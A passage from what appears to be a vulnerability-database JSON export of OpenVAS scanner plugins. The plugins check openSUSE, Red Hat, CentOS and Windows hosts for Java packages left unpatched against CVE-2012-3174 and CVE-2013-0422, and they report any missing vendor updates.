GmbH\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"openSUSE12.2\")\n{\n\n if ((res = isrpmvuln(pkg:\"java-1_7_0-openjdk\", rpm:\"java-1_7_0-openjdk~1.7.0.6~3.20.1\", rls:\"openSUSE12.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"java-1_7_0-openjdk-debuginfo\", rpm:\"java-1_7_0-openjdk-debuginfo~1.7.0.6~3.20.1\", rls:\"openSUSE12.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"java-1_7_0-openjdk-debugsource\", rpm:\"java-1_7_0-openjdk-debugsource~1.7.0.6~3.20.1\", rls:\"openSUSE12.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"java-1_7_0-openjdk-demo\", rpm:\"java-1_7_0-openjdk-demo~1.7.0.6~3.20.1\", rls:\"openSUSE12.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"java-1_7_0-openjdk-demo-debuginfo\", rpm:\"java-1_7_0-openjdk-demo-debuginfo~1.7.0.6~3.20.1\", rls:\"openSUSE12.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"java-1_7_0-openjdk-devel\", rpm:\"java-1_7_0-openjdk-devel~1.7.0.6~3.20.1\", rls:\"openSUSE12.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"java-1_7_0-openjdk-devel-debuginfo\", rpm:\"java-1_7_0-openjdk-devel-debuginfo~1.7.0.6~3.20.1\", rls:\"openSUSE12.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"java-1_7_0-openjdk-javadoc\", rpm:\"java-1_7_0-openjdk-javadoc~1.7.0.6~3.20.1\", rls:\"openSUSE12.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"java-1_7_0-openjdk-src\", rpm:\"java-1_7_0-openjdk-src~1.7.0.6~3.20.1\", rls:\"openSUSE12.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-07-27T10:51:31", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-3174", "CVE-2013-0422"], "description": "Check for the Version of java-1.7.0-openjdk", "modified": "2017-07-12T00:00:00", "published": "2013-01-21T00:00:00", "id": "OPENVAS:870889", "href": "http://plugins.openvas.org/nasl.php?oid=870889", "type": "openvas", "title": "RedHat Update for java-1.7.0-openjdk RHSA-2013:0165-01", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# RedHat Update for java-1.7.0-openjdk RHSA-2013:0165-01\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2013 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"These packages provide the OpenJDK 7 Java Runtime Environment and the\n OpenJDK 7 Software Development Kit.\n\n Two improper permission check issues were discovered in the reflection API\n in OpenJDK. An untrusted Java application or applet could use these flaws\n to bypass Java sandbox restrictions. (CVE-2012-3174, CVE-2013-0422)\n\n This erratum also upgrades the OpenJDK package to IcedTea7 2.3.4. Refer to\n the NEWS file, linked to in the References, for further information.\n\n All users of java-1.7.0-openjdk are advised to upgrade to these updated\n packages, which resolve these issues. All running instances of OpenJDK Java\n must be restarted for the update to take effect.\";\n\n\ntag_affected = \"java-1.7.0-openjdk on Red Hat Enterprise Linux (v. 5 server),\n Red Hat Enterprise Linux Desktop (v. 6),\n Red Hat Enterprise Linux Server (v. 6),\n Red Hat Enterprise Linux Workstation (v. 6)\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"https://www.redhat.com/archives/rhsa-announce/2013-January/msg00036.html\");\n script_id(870889);\n script_version(\"$Revision: 6687 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-12 11:46:43 +0200 (Wed, 12 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2013-01-21 09:36:09 +0530 (Mon, 21 Jan 2013)\");\n script_cve_id(\"CVE-2012-3174\", \"CVE-2013-0422\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name: \"RHSA\", value: \"2013:0165-01\");\n script_name(\"RedHat Update for java-1.7.0-openjdk RHSA-2013:0165-01\");\n\n script_summary(\"Check for the Version of java-1.7.0-openjdk\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2013 Greenbone Networks GmbH\");\n script_family(\"Red Hat Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/rhel\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"RHENT_6\")\n{\n\n if ((res = isrpmvuln(pkg:\"java-1.7.0-openjdk\", rpm:\"java-1.7.0-openjdk~1.7.0.9~2.3.4.1.el6_3\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"java-1.7.0-openjdk-debuginfo\", rpm:\"java-1.7.0-openjdk-debuginfo~1.7.0.9~2.3.4.1.el6_3\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"java-1.7.0-openjdk-devel\", rpm:\"java-1.7.0-openjdk-devel~1.7.0.9~2.3.4.1.el6_3\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"RHENT_5\")\n{\n\n if ((res = isrpmvuln(pkg:\"java-1.7.0-openjdk\", rpm:\"java-1.7.0-openjdk~1.7.0.9~2.3.4.el5_9.1\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"java-1.7.0-openjdk-debuginfo\", rpm:\"java-1.7.0-openjdk-debuginfo~1.7.0.9~2.3.4.el5_9.1\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"java-1.7.0-openjdk-demo\", rpm:\"java-1.7.0-openjdk-demo~1.7.0.9~2.3.4.el5_9.1\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"java-1.7.0-openjdk-devel\", rpm:\"java-1.7.0-openjdk-devel~1.7.0.9~2.3.4.el5_9.1\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"java-1.7.0-openjdk-javadoc\", rpm:\"java-1.7.0-openjdk-javadoc~1.7.0.9~2.3.4.el5_9.1\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"java-1.7.0-openjdk-src\", rpm:\"java-1.7.0-openjdk-src~1.7.0.9~2.3.4.el5_9.1\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-01-26T11:09:47", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-3174", "CVE-2013-0422"], "description": "Check for the Version of java", "modified": "2018-01-25T00:00:00", "published": "2013-01-21T00:00:00", "id": "OPENVAS:881557", "href": "http://plugins.openvas.org/nasl.php?oid=881557", "type": "openvas", "title": "CentOS Update for java CESA-2013:0165 centos5 ", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# CentOS Update for java CESA-2013:0165 centos5 \n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2013 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"These packages provide the OpenJDK 7 Java Runtime Environment and the\n OpenJDK 7 Software Development Kit.\n\n Two improper permission check issues were discovered in the reflection API\n in OpenJDK. An untrusted Java application or applet could use these flaws\n to bypass Java sandbox restrictions. (CVE-2012-3174, CVE-2013-0422)\n \n This erratum also upgrades the OpenJDK package to IcedTea7 2.3.4. Refer to\n the NEWS file, linked to in the References, for further information.\n \n All users of java-1.7.0-openjdk are advised to upgrade to these updated\n packages, which resolve these issues. All running instances of OpenJDK Java\n must be restarted for the update to take effect.\";\n\n\ntag_affected = \"java on CentOS 5\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.centos.org/pipermail/centos-announce/2013-January/019203.html\");\n script_id(881557);\n script_version(\"$Revision: 8526 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-01-25 07:57:37 +0100 (Thu, 25 Jan 2018) $\");\n script_tag(name:\"creation_date\", value:\"2013-01-21 09:37:56 +0530 (Mon, 21 Jan 2013)\");\n script_cve_id(\"CVE-2012-3174\", \"CVE-2013-0422\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name: \"CESA\", value: \"2013:0165\");\n script_name(\"CentOS Update for java CESA-2013:0165 centos5 \");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of java\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2013 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"CentOS5\")\n{\n\n if ((res = isrpmvuln(pkg:\"java-1.7.0-openjdk\", rpm:\"java-1.7.0-openjdk~1.7.0.9~2.3.4.el5_9.1\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"java-1.7.0-openjdk-demo\", rpm:\"java-1.7.0-openjdk-demo~1.7.0.9~2.3.4.el5_9.1\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"java-1.7.0-openjdk-devel\", rpm:\"java-1.7.0-openjdk-devel~1.7.0.9~2.3.4.el5_9.1\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"java-1.7.0-openjdk-javadoc\", rpm:\"java-1.7.0-openjdk-javadoc~1.7.0.9~2.3.4.el5_9.1\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"java-1.7.0-openjdk-src\", rpm:\"java-1.7.0-openjdk-src~1.7.0.9~2.3.4.el5_9.1\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-11-13T12:52:04", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-3174", "CVE-2013-0422"], "description": "This host is installed with Oracle Java SE and is prone to multiple\n code execution vulnerabilities.", "modified": "2017-11-08T00:00:00", "published": "2013-01-17T00:00:00", "id": "OPENVAS:803156", "href": "http://plugins.openvas.org/nasl.php?oid=803156", "type": "openvas", "title": "Oracle Java SE Multiple Remote Code Execution Vulnerabilities (Windows)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_oracle_java_se_mult_code_execution_vuln_win.nasl 7699 2017-11-08 12:10:34Z santu $\n#\n# Oracle Java SE Multiple Remote Code Execution Vulnerabilities (Windows)\n#\n# Authors:\n# Antu Sanadi <santu@secpod.com>\n#\n# Copyright:\n# Copyright (c) 2013 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ntag_insight = \"- An error in Java Management Extensions (JMX) MBean components which allows\n remote attackers to execute arbitrary code via unspecified vectors.\n - An unspecified error exists within the Libraries subcomponent.\n\n NOTE: The vendor reports that only version 7.x is affected. However,\n some security researchers indicate that some 6.x versions may\n be affected\";\n\ntag_impact = \"Successful exploitation allows remote attackers to execute arbitrary code\n via unspecified vectors,\n Impact Level: System/Application\";\n\ntag_affected = \"Oracle Java version 7 before Update 11 on windows\";\ntag_solution = \"Upgrade to Oracle Java 7 Update 11 or later\n For updates refer to\n http://www.oracle.com/technetwork/topics/security/alert-cve-2013-0422-1896849.html\";\ntag_summary = \"This host is installed with Oracle Java SE and is prone to multiple\n code execution vulnerabilities.\";\n\nif(description)\n{\n script_id(803156);\n script_version(\"$Revision: 7699 $\");\n script_cve_id(\"CVE-2012-3174\", \"CVE-2013-0422\");\n script_bugtraq_id(57246, 57312);\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-11-08 13:10:34 +0100 (Wed, 08 Nov 2017) $\");\n script_tag(name:\"creation_date\", value:\"2013-01-17 12:41:59 +0530 (Thu, 17 Jan 2013)\");\n script_name(\"Oracle Java SE Multiple Remote Code Execution Vulnerabilities (Windows)\");\n script_xref(name : \"URL\" , value : \"http://secunia.com/advisories/51820/\");\n script_xref(name : \"URL\" , value : \"http://securitytracker.com/id?1027972\");\n script_xref(name : \"URL\" , value : \"http://www.kb.cert.org/vuls/id/625617\");\n script_xref(name : \"URL\" , value : \"http://www.oracle.com/technetwork/java/javase/7u11-relnotes-1896856.html\");\n script_xref(name : \"URL\" , value : \"http://www.oracle.com/technetwork/topics/security/alert-cve-2013-0422-1896849.html\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2013 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"gb_java_prdts_detect_win.nasl\");\n script_require_keys(\"Sun/Java/JRE/Win/Ver\");\n script_tag(name : \"impact\" , value : tag_impact);\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"registry\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\ninclude(\"version_func.inc\");\n\n## Variable Initialization\njreVer = \"\";\n\n## Get JRE Version from KB\njreVer = get_kb_item(\"Sun/Java/JRE/Win/Ver\");\n\nif(jreVer)\n{\n ## Check for Oracle Java SE versions 1.7 to 1.7.0_10\n if(version_in_range(version:jreVer, test_version:\"1.7\", test_version2:\"1.7.0.10\")){\n security_message(0);\n }\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-05-29T18:38:15", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-3174", "CVE-2013-0422"], "description": "The remote host is missing an update for the ", "modified": "2019-03-15T00:00:00", "published": "2013-01-21T00:00:00", "id": "OPENVAS:1361412562310881564", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310881564", "type": "openvas", "title": "CentOS Update for java CESA-2013:0165 centos6", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# CentOS Update for java CESA-2013:0165 centos6\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2013 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_xref(name:\"URL\", value:\"http://lists.centos.org/pipermail/centos-announce/2013-January/019204.html\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.881564\");\n script_version(\"$Revision: 14222 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 13:50:48 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2013-01-21 09:39:47 +0530 (Mon, 21 Jan 2013)\");\n script_cve_id(\"CVE-2012-3174\", \"CVE-2013-0422\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name:\"CESA\", value:\"2013:0165\");\n script_name(\"CentOS Update for java CESA-2013:0165 centos6\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'java'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2013 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\", re:\"ssh/login/release=CentOS6\");\n script_tag(name:\"affected\", value:\"java on CentOS 6\");\n script_tag(name:\"solution\", value:\"Please install the updated packages.\");\n script_tag(name:\"insight\", value:\"These packages provide the OpenJDK 7 Java Runtime Environment and the\n OpenJDK 7 Software Development Kit.\n\n Two improper permission check issues were discovered in the reflection API\n in OpenJDK. An untrusted Java application or applet could use these flaws\n to bypass Java sandbox restrictions. (CVE-2012-3174, CVE-2013-0422)\n\n This erratum also upgrades the OpenJDK package to IcedTea7 2.3.4. Refer to\n the NEWS file, linked to in the References, for further information.\n\n All users of java-1.7.0-openjdk are advised to upgrade to these updated\n packages, which resolve these issues. All running instances of OpenJDK Java\n must be restarted for the update to take effect.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"CentOS6\")\n{\n\n if ((res = isrpmvuln(pkg:\"java-1.7.0-openjdk\", rpm:\"java-1.7.0-openjdk~1.7.0.9~2.3.4.1.el6_3\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"java-1.7.0-openjdk-demo\", rpm:\"java-1.7.0-openjdk-demo~1.7.0.9~2.3.4.1.el6_3\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"java-1.7.0-openjdk-devel\", rpm:\"java-1.7.0-openjdk-devel~1.7.0.9~2.3.4.1.el6_3\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"java-1.7.0-openjdk-javadoc\", rpm:\"java-1.7.0-openjdk-javadoc~1.7.0.9~2.3.4.1.el6_3\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"java-1.7.0-openjdk-src\", rpm:\"java-1.7.0-openjdk-src~1.7.0.9~2.3.4.1.el6_3\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-01-31T18:41:01", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-3174", "CVE-2013-0422"], "description": "The remote host is missing an update for the ", "modified": "2020-01-31T00:00:00", "published": "2013-03-11T00:00:00", "id": "OPENVAS:1361412562310850427", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310850427", "type": "openvas", "title": "openSUSE: Security Advisory for java-1_7_0-openjdk (openSUSE-SU-2013:0199-1)", "sourceData": "# Copyright (C) 2013 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) of their respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_xref(name:\"URL\", value:\"https://lists.opensuse.org/opensuse-security-announce/2013-01/msg00025.html\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.850427\");\n script_version(\"2020-01-31T08:23:39+0000\");\n script_tag(name:\"last_modification\", value:\"2020-01-31 08:23:39 +0000 (Fri, 31 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2013-03-11 18:29:19 +0530 (Mon, 11 Mar 2013)\");\n script_cve_id(\"CVE-2012-3174\", \"CVE-2013-0422\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name:\"openSUSE-SU\", value:\"2013:0199-1\");\n script_name(\"openSUSE: Security Advisory for java-1_7_0-openjdk (openSUSE-SU-2013:0199-1)\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'java-1_7_0-openjdk'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2013 Greenbone Networks GmbH\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse\", \"ssh/login/rpms\", re:\"ssh/login/release=openSUSE12\\.2\");\n\n script_tag(name:\"affected\", value:\"java-1_7_0-openjdk on openSUSE 12.2\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"insight\", value:\"java-1_7_0-openjdk was updated to icedtea-2.3.4 fixing bugs\n and also severe security issues:\n\n * Security fixes\n\n - S8004933, CVE-2012-3174: Improve MethodHandle\n interaction with libraries\n\n - S8006017, CVE-2013-0422: Improve lookup resolutions\n\n - S8006125: Update MethodHandles library interactions\n\n * Bug fixes\n\n - S7197906: BlockOffsetArray::power_to_cards_back() needs\n to handle &> 32 bit shifts\n\n - G422525: Fix building with PaX enabled kernels.\n\n - use gpg-offline to check the validity of icedtea tarball\n\n - use jamvm on %arm\n\n - use icedtea package name instead of protected openjdk for\n jamvm builds\n\n - fix armv5 build\n\n - update to java access bridge 1.26.2\n\n * bugfix release, mainly 64bit JNI and JVM support\n\n - fix a segfault in AWT code - (bnc#792951)\n\n * add openjdk-7-src-b147-awt-crasher.patch\n\n - turn pulseaudio off on pre 11.4 distros\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"openSUSE12.2\") {\n if(!isnull(res = isrpmvuln(pkg:\"java-1_7_0-openjdk\", rpm:\"java-1_7_0-openjdk~1.7.0.6~3.20.1\", rls:\"openSUSE12.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"java-1_7_0-openjdk-debuginfo\", rpm:\"java-1_7_0-openjdk-debuginfo~1.7.0.6~3.20.1\", rls:\"openSUSE12.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"java-1_7_0-openjdk-debugsource\", rpm:\"java-1_7_0-openjdk-debugsource~1.7.0.6~3.20.1\", rls:\"openSUSE12.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"java-1_7_0-openjdk-demo\", rpm:\"java-1_7_0-openjdk-demo~1.7.0.6~3.20.1\", rls:\"openSUSE12.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"java-1_7_0-openjdk-demo-debuginfo\", rpm:\"java-1_7_0-openjdk-demo-debuginfo~1.7.0.6~3.20.1\", rls:\"openSUSE12.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"java-1_7_0-openjdk-devel\", rpm:\"java-1_7_0-openjdk-devel~1.7.0.6~3.20.1\", rls:\"openSUSE12.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"java-1_7_0-openjdk-devel-debuginfo\", rpm:\"java-1_7_0-openjdk-devel-debuginfo~1.7.0.6~3.20.1\", rls:\"openSUSE12.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"java-1_7_0-openjdk-javadoc\", rpm:\"java-1_7_0-openjdk-javadoc~1.7.0.6~3.20.1\", rls:\"openSUSE12.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"java-1_7_0-openjdk-src\", rpm:\"java-1_7_0-openjdk-src~1.7.0.6~3.20.1\", rls:\"openSUSE12.2\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if(__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "amazon": [{"lastseen": "2020-11-10T12:35:23", "bulletinFamily": "unix", "cvelist": ["CVE-2012-3174"], "description": "**Issue 